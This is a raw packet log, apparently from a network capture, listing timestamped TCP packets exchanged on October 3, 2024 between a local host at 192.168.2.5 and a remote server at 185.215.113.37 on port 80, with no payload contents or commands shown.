Oct 3, 2024 21:36:14.990792990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990803003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990812063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990822077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990830898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990838051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990845919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990854025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990864038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990873098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990880013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990890026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990899086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990906000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990915060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990921021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990931034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990940094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990947008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990958929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.990964890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.990983009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991008043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991533995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991544008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991554022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991563082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991571903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991581917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991591930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991600037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991607904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991619110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991626978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991635084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991642952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991652966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991662979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991668940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991677999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991688013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991693974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991703033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991708994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991718054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991729975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.991735935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.991765976 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.992289066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.992299080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.992307901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.992317915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.992348909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.992360115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.006273985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006411076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006418943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006428003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006437063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006445885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006453991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006464005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.006484032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.006521940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.073800087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.073857069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.073868036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.073878050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.073926926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.073985100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.073996067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074006081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074017048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074045897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074062109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074117899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074134111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074142933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074152946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074161053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074174881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074198008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074281931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074291945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074301004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074311018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074321985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074338913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074374914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074374914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074492931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074502945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074512005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074537992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074564934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074650049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074659109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074668884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074677944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074687958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074718952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074742079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074791908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074800968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074810982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074852943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074871063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074881077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074889898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074899912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074913025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.074918985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074938059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.074966908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075166941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075176954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075186968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075212955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075242043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075277090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075287104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075297117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075305939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075342894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075509071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075519085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075527906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075537920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075547934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075555086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075565100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075577021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075582027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075591087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075606108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075623989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075750113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075808048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075819016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075828075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075839043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075864077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075879097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075936079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.075977087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.075999022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076008081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076016903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076045990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076070070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076193094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076201916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076211929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076221943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076232910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076237917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076247931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076256990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076263905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076272964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076280117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076298952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076324940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076495886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076504946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076514959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076524973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076548100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076571941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076666117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076675892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076685905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076702118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076710939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076721907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076728106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076736927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076747894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076754093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076762915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076775074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076781034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076790094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076797009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076805115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076814890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076822996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076831102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076843023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.076849937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076867104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.076889992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077655077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077665091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077675104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077686071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077697039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077702045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077712059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077722073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077730894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077739000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077754021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077759027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077773094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077780962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077791929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077797890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077807903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077816010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077824116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077835083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077840090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077850103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077862978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077867985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077877998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077888966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077917099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.077989101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.077997923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.078006983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.078016996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.078027010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.078035116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.078046083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.078051090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.078063011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.078068018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.078087091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.078105927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.093528032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.093652010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.093662024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.093668938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.093677998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.093683958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.093698025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.093704939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.093758106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.160702944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.160789967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.160815954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.160825968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.160840034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.160849094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.160859108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.160871029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.160913944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.160964012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161037922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161047935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161056995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161065102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161075115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161089897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161111116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161278009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161288023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161297083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161305904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161315918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161324978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161331892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161339045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161348104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161354065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161381960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161561966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161643028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161660910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161674976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161684990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161695004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161704063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161717892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161746025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161904097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161914110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161922932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161933899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161942959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161948919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161958933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.161964893 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.161982059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162015915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162285089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162295103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162303925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162313938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162326097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162331104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162338018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162348032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162354946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162364006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162373066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162379980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162389994 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162395000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162411928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162431955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162843943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162853956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162863016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162870884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162880898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162888050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162895918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162905931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162918091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162923098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162931919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162938118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162946939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162957907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162962914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162972927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162980080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.162987947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.162997961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.163005114 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.163014889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.163031101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.163049936 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.163577080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.163585901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.163594961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.163604975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.163614035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:15.163619995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:15.163629055 CEST	80	49704	185.215.113.37	192.168.2.5
